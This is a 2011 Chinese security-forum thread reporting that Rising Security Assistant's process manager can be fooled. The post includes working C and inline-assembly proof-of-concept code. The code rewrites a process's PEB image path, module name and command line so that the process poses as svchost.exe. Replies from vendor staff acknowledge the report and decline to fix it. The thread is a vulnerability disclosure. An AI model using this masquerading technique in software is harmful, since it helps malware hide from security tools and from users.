瑞星卡卡安全论坛个人产品讨论区瑞星其他产品瑞星安全助手 安全助手的进程管理器存在路径识别BUG

1   1  /  1  页   跳转

[疑似bug] 安全助手的进程管理器存在路径识别BUG

安全助手的进程管理器存在路径识别BUG

进程可以轻松的通过PEB->_RTL_USER_PROCESS_PARAMETERS ->ImagePathName修改自身的路径来欺骗瑞星安全助手的进程管理器
在XP SP3, X86下的测试


看图中的ModifyImagePath.exe瑞星的进程管理器中显示的是安全,难道已经入库了

在点击进程名,打开属性,很明显这是系统svchost的属性

这方法好像也能骗过卡卡6和SRENG。。。。

在XP下的测试代码如下:

int _tmain(int argc, _TCHAR* argv[])
{
        WCHAR szpath[MAX_PATH] = {0};
        int len = 0;
        len = GetSystemDirectory(szpath,MAX_PATH);
        wcscat_s(szpath,len + 13,L"\\svchost.exe");
        printf("%ls\n",szpath);
       
        __asm
        {           
                mov eax, fs:[30h]            //get the PEB address
                mov eax, [eax+0xC]            //_PEB_LDR_DATA
                mov eax, [eax+0xC]            //InLoadOrderModuleList
                lea ebx,szpath
                mov WORD ptr[eax+0x24],0x60  //FullDllName->Length
                mov [eax+0x28],ebx            //FullDllName->Buffer

                mov eax, fs:[30h]
                mov eax,[eax+0x10]          //peb->_RTL_USER_PROCESS_PARAMETERS
                lea eax,[eax+0x3c]            //_RTL_USER_PROCESS_PARAMETERS ->ImagePathName->Buffer
                lea ebx,szpath
                mov [eax],ebx                //ImagePathName->Buffer
                mov WORD ptr[eax-4],0x60    //ImagePathName->Length

                mov eax, fs:[30h]
                mov eax,[eax+0x10]          //peb->_RTL_USER_PROCESS_PARAMETERS
                lea eax,[eax+0x44]            //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer
                lea ebx,szpath
                mov [eax],ebx                //CommandLine-->Buffer
                mov WORD ptr[eax-4],0x60    //CommandLine-->Length
        }
        getchar();
        return 0;
}


操作系统:XP SP3 ,补丁打倒最新版本
安全助手版本:01.00.00.14

用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 QQDownload/1.7

附件附件:

下载次数:393
文件类型:unknown/unknown
文件大小:
上传时间:2011-2-21 10:46:50
描述:rar

分享到:
gototop
 

回复:安全助手的进程管理器存在路径识别BUG

这个能骗过又不是一家两家的简易进程管理器

非内核级的普通进程管理器都可能被骗
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 

回复:安全助手的进程管理器存在路径识别BUG

此问题已收集反馈,感谢支持!
gototop
 

回复:安全助手的进程管理器存在路径识别BUG

此问题暂不做修改。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT